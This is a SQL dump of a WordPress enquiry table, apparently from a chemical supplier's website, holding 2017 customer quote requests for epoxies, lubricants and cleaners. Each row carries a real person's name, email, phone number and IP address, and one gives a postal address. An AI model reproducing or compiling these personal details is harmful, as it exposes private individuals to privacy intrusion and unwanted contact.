INSERT INTO `wp_enquiry_detail_new` VALUES (1200, 'Kristen Dutra', 'kristen.dutra@temp-pro.com', 'Hello-\n\nPlease quote 1 pint, EPON 828 clear  Part number EPON828-PT, Must have 80% shelf life remaining', '413584-3165', 'Hexion EPON 828', '74.94.180.245', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-06 19:08:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1201, 'Sean Lynch', 'lynchs3@wwu.edu', 'I am an undergraduate at Western doing directed research. Do you have small quantities of 834 and 825 available for purchase. I am interested in a quart of each. Thank you.\n\nSean', '719641-4415', 'Research Sample', '140.160.73.236', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"885";s:5:"title";s:11:"EPON™ 834";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-834.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-06 21:00:36', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1202, 'Chris Murray', 'Drchrism@hotmail.com', 'Hi, I\'m looking for a product recommendation for use in Porsche racing CV joints. According to your website the GPL 217 is listed as Extreme pressure and the GPL 227 as anti-corrosion. Local racers have indicated they have used both products and I\'m interested in a recommendation for the best product for use in the CV joints of a Porsche race car.\n\nThanks,\nChris', '510538-3800', 'Product recommendation for CV joints', '108.255.77.191', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"824";s:5:"title";s:7:"GPL 217";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_149749874.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-06 23:24:53', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1203, 'DIYANA ', 'diyana@qiblatin.com', 'END USER ROYAL MALAYSIAN AIRFORCE.QTY 4 TUBES. URGENT PRICE REQUIRED.', '+6012-9831884', 'request for quote ', '175.139.151.201', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"4";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-07 05:13:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1204, 'Ryan Brewer', 'ryan.brewer@poseidonsys.com', 'Hello,\n\nI\'m looking for pricing and availability of MS-557 flux remover. If you could provide information directly, or point me to a distributor, I would appreciate it.\n\nThank you,\n\nRyan', '585239-6025', 'MS-557', '24.97.193.162', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-07 14:34:21', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1205, 'Sean Lynch', 'lynchs3@wwu.edu', 'I am a research assistant at Western Washington University looking for a quart size of 834. ', '719641-4415', 'Price per Quart', '140.160.79.25', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"885";s:5:"title";s:11:"EPON™ 834";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-834.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-07 18:11:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1206, 'Prashant Agrawal', '12pa19@queensu.ca', 'Hi There,\nCan you please provide me with a quote of Krytox 103 and Krytox 100?\n ', '343333-2420', 'Krytox 103 Price', '130.15.99.206', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"438";s:5:"title";s:7:"GPL 103";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease3.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-07 20:57:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1207, 'Andrew Breuhaus', 'breuhaa@umich.edu', 'I am interested in the price for both a quart and a gallon of MS-452N protective varnish.', '206422-1344', 'Price quote request', '141.211.122.207', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"622";s:5:"title";s:7:"MS-452N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-452N.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-07 21:31:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1208, 'todd', 'toddkruper@gmail.com', 'How much and when can I get it! It will work for cement?  Right\nthanks\ntodd', '707599-6188', 'mold release', '75.111.30.248', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"310";s:5:"title";s:46:"ReleaSys™ 8900 | Urethane Mold Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_523637050.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-08 01:29:50', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1209, 'meagan', 'megstrake@gmail.com', 'I am interested in your epoxy resins. I would greatly appreciate it, if you could send me a price list. \nthank you for your time', '314724-2525', 'pricing info req', '96.35.62.149', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"895";s:5:"title";s:12:"EPON™ 8281";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-8281.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-10 05:35:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1210, 'meagan', 'megstrake@gmail.com', 'requesting pricing info. \nthanks!\n', '', '', '96.35.62.149', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"924";s:5:"title";s:13:"EPON™ 1001F";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-RESIN-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-10 05:41:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1211, 'Andrew Breuhaus', 'breuhaa@umich.edu', 'I would like a PDF price quote for 1 gallon of MS-477C Acrylic Conformal Coating sent to my email if possible.\n\nThank You', '', 'PDF Price quote for MS-477C', '141.211.122.207', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"637";s:5:"title";s:7:"MS-477C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-477C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-10 16:35:16', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1212, 'Hari Vijayamohanan', 'vijayh@rpi.edu', 'Could you please provide pricing info or a quote for 1 quart of EPON SU-8 resist to be used in our lab for academic research:\n\nShip to address is:\nHari Vijaymohanan\nRensselaer Polytechnic Institute\nSmart Lighting ERC/CII 7015\n110 8th Street\nTroy, NY 12180-3590\n\nBilling address:\nATTN: Danielle Teal\nP.O. Box 80127\nRaleigh, NC 27623\nUnited States', '518961-6692', 'Require one quart of SU-8 polymer', '129.161.83.81', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"952";s:5:"title";s:12:"EPON™ SU-8";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-SU-8.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-10 17:20:32', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1213, 'Matthew Gilliam', 'msgillia@asu.edu', 'Hello,\n\nI request a quote for Epon 862.  I intend to use it to make epoxy nanocomposites.', '505328-1261', 'Epon 862 Price Inquiry', '149.169.215.51', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-10 17:30:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1214, 'Matthew Gilliam', 'msgillia@asu.edu', 'Hello,\n\nI would like a quote for quart and gallon sizes of your Epikure 3055.  I intend to use that and Epon 862 to make epoxy nanocomposites.\n\nThank you!', '505328-1261', 'Epikure 3055', '209.147.144.3', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1168";s:5:"title";s:15:"EPIKURE™ 3055";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-10 19:24:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1215, 'Bill Millard', 'BMillard@Logus.com', 'Could I get a price for a 2oz tube with C of C and MSDS. Also who would I call and speak with to place an order. ', '', 'KRYTOX Grease #240 ac ', '23.24.185.241', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-10 19:42:52', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1216, 'Marilyn', 'batista@lanl.gov', 'Is it $82 can can I get it online?', '505665-6066', 'cost of one gallon of Epon Resin 815 C', '192.12.184.6', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"910";s:5:"title";s:12:"EPON™ 815C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-815C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-10 20:56:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1217, 'KIM ARNOLD', 'kim.arnold@tracelogix.com', 'Please send me pricing on your Krytox 105 for both the 1-ounce and the 2-ounce "Needle Nose" bottles.\n\nThank you in advance,\nKim Arnold\nParts &amp; Inventory Administrator\nTracelogix Inc.\nWhitby, Ontario\n1-905-666-4212 Ext.226', '905666-4212', 'Price Quote for Krytox 105', '66.11.73.250', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"440";s:5:"title";s:7:"GPL 105";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease5.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-10 21:52:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1218, 'Mc denBoeft', 'mark.denboeft@fokker.com', 'I want to recive a quote per gallon of MS-260 Plastic, Glass &amp; Metal Cleaner. This is required to perform cleaning on a A-318 winshield', '', 'Cleaning agent', '92.64.200.220', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-11 10:25:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1219, 'Al DeLaurentis', 'alfred@morsewatchman.com', 'We need to reorder , hopefully you have us on record. PLease Email me or call me x 526. ', '203264-4949', 'Need to order again', '173.9.91.17', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-11 11:15:15', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1220, 'Dennis Cremers', 'dennis.cremers@fokker.com', 'Can you please quote us 24 sprycan\'s of this product ?', '+31654272523', 'RFQ', '92.64.200.220', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:2:"24";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-11 12:07:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1221, 'Moonkyung Kim', 'mkim194@illinois.edu', 'Hi, I wanted to order this product. I already ordered it before :) this time, I need a small amount if possible. Would you please send me to quote asap? Thanks. ', '217974-5658', 'Wanted to order this product.', '192.241.58.166', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-11 15:59:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1222, 'Matthew James Turner', 'matthewturner@g.harvard.edu', 'Hello,\n\nI would like to request a quote for MS-111', '562595-3671', 'Quote', '65.112.8.68', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:30:"MS-111 | Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-11 17:51:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1223, 'Philippe Bourrianne', 'pbourria@mit.edu', 'Hi,\n\nCould I have an invoice for the order of 2 Krytox1506 bottles (500g each)?\n\nThanks in advance,\n\nBest,\nPhilippe', '', '', '18.80.8.219', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"943";s:5:"title";s:8:"VPF 1506";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_257574442.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-11 21:22:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1224, 'Alex Huang', 'changchia_huang@apple.com', 'Please provide the quote of 2 bottles of MS122', '408221-6932', 'Quotation request', '17.209.19.249', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-12 00:52:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1225, 'Ken Lee', 'ken.lee@arlut.utexas.edu', 'need 2 cases of MS-465C acrylic confomal coating. Miller-Stephenson', '512835-3739', 'price quote', '146.6.208.38', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"733";s:5:"title";s:35:"MS-465C | Acrylic Conformal Coating";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-465C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-12 15:22:29', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1226, 'Andrew Willig', 'willig@hebirobotics.com', 'We\'re having trouble with Krytox GPL 215 and 217 in our robotics gearbox with spur gears where the pressure of the gears on the shafts seems to be removing all of the grease from the surface of our shafts causing corrosion and gears seizing. We have some GPL 227 that we are going to try, but are curious if the GB C2 may have better properties at high shaft pressure and fairly low speeds. Operating temperatures range in the 80-150 Degrees Celcius.', '516776-8186', 'Krytox GB C2', '74.98.251.134', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"3724";s:5:"title";s:12:"Krytox GB C2";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_447896557.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-12 18:01:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1227, 'Joel Mueller', 'joel.mueller@ualberta.ca', 'Could you please provide a quote for one (1) of 2oz tube and one (1) of 8oz tube of Krytox GPL 205. What would be the shipping estimate to Lethbridge, Alberta?\n\nThank-you', '', '2oz and 8oz tube quote', '70.65.93.79', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-12 20:04:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1228, 'William Bryant', 'william.1.bryant@gm.com', 'Hello, I need to purchase (4) 28.2oz canisters of the Krytox GPL-226.  Could you please supply a quote.\nThanks,\nBill B.', '586859-1392', 'Pricing / Supply Request for GPL-226', '198.208.251.22', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"850";s:5:"title";s:7:"GPL 226";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_92739160.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-13 16:19:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1229, 'Sait', 'scaliskan@onurgroup.com', 'Pls give me price ms 260 ', '', 'Price', '213.153.172.210', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-14 08:48:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1230, 'mjoyner', 'mjoyner@mschem.com', 'Test', '', 'Test', '198.0.163.158', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-14 16:34:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1231, 'Gilberto Herrera', 'apluswinding@gmail.com', 'MS-122SE \n\nneed price pleas ', '630818-6050', 'price ', '73.111.156.142', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"302";s:5:"title";s:34:"MS-122SE | PTFE Mold Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:83:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-122SE-Aerospace.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-14 20:13:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1232, 'Kaho Ichikawa', 'kaho_i@purdys.com', 'Hello,\n\nWe are Purdy\'s Chocolatier in Vancouver.\n\nColuld you give me a quote for this item x 12 ea and also x 1 ea.\nPlease let me know if you have an idea how long lead time takes and how much freight cost is.', '604454-2770', 'quote', '206.108.21.221', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-14 23:03:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1233, 'Vikas Rastogi', 'vikas.r@bharatforge.com', 'Aero Duster MS - 222N\nQyy - 02 Nos\nin hyderabad - URGENT required', '+919993706989', 'Urgent Requirement at Hyderabad', '110.224.56.116', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-15 10:49:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1234, 'Patrick Fullem', 'pfullem63@gmail.com', 'Hi,  I would like to purchase some of this oil to add to my motor oil in my !998 Toyota 4-Runner V-6 motor.  What amount do you suggest and how much is the price? \nThanks,\nPatrick', '', '', '69.54.28.87', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"437";s:5:"title";s:7:"GPL 102";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-16 18:01:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1235, 'Angel', 'mei.customercare21@gmail.com', 'Dear Sir/Madam,\n\nPlease send me price offer on this item,\n\nGrease KRYTOX GPL-227\n\nLooking forward to hear from you.\n\nBest Regards,', '+639075207269', 'Request for Quotation', '110.54.214.107', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"852";s:5:"title";s:7:"GPL 227";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_316632911.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-17 00:46:58', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1236, 'Aseet Mukherjee', 'aseet@fnal.gov', 'Would like the price for a 1quart container of Epon 828 resin.', '331218-9882', 'Price for Epon 828 resin', '131.225.39.62', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-17 13:09:52', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1237, 'Sam Nelson', 'snelson43@gatech.edu', 'This is for Dr. Yushins research lab at Georgia Institute of Technology in Atlanta, GA for use in epoxy matrix experiments', '541598-6100', 'Quote for Mold Release Agent', '143.215.52.62', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"400";s:5:"title";s:44:"ReleaSys 82 | Water-based PTFE Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:84:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Windmill-ReleaSys82.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-17 15:16:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1238, 'Kristina Burton', 'KristinaB@stanleyeng.com', 'Need 1 bottle quoted with Epi Cure Curing Agent 3140 Kit. This product needs to have full trace-ability. ', '410582-8872', '', '50.203.117.202', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-17 15:43:54', '', NULL, '', '', '', NULL, '', ''); 
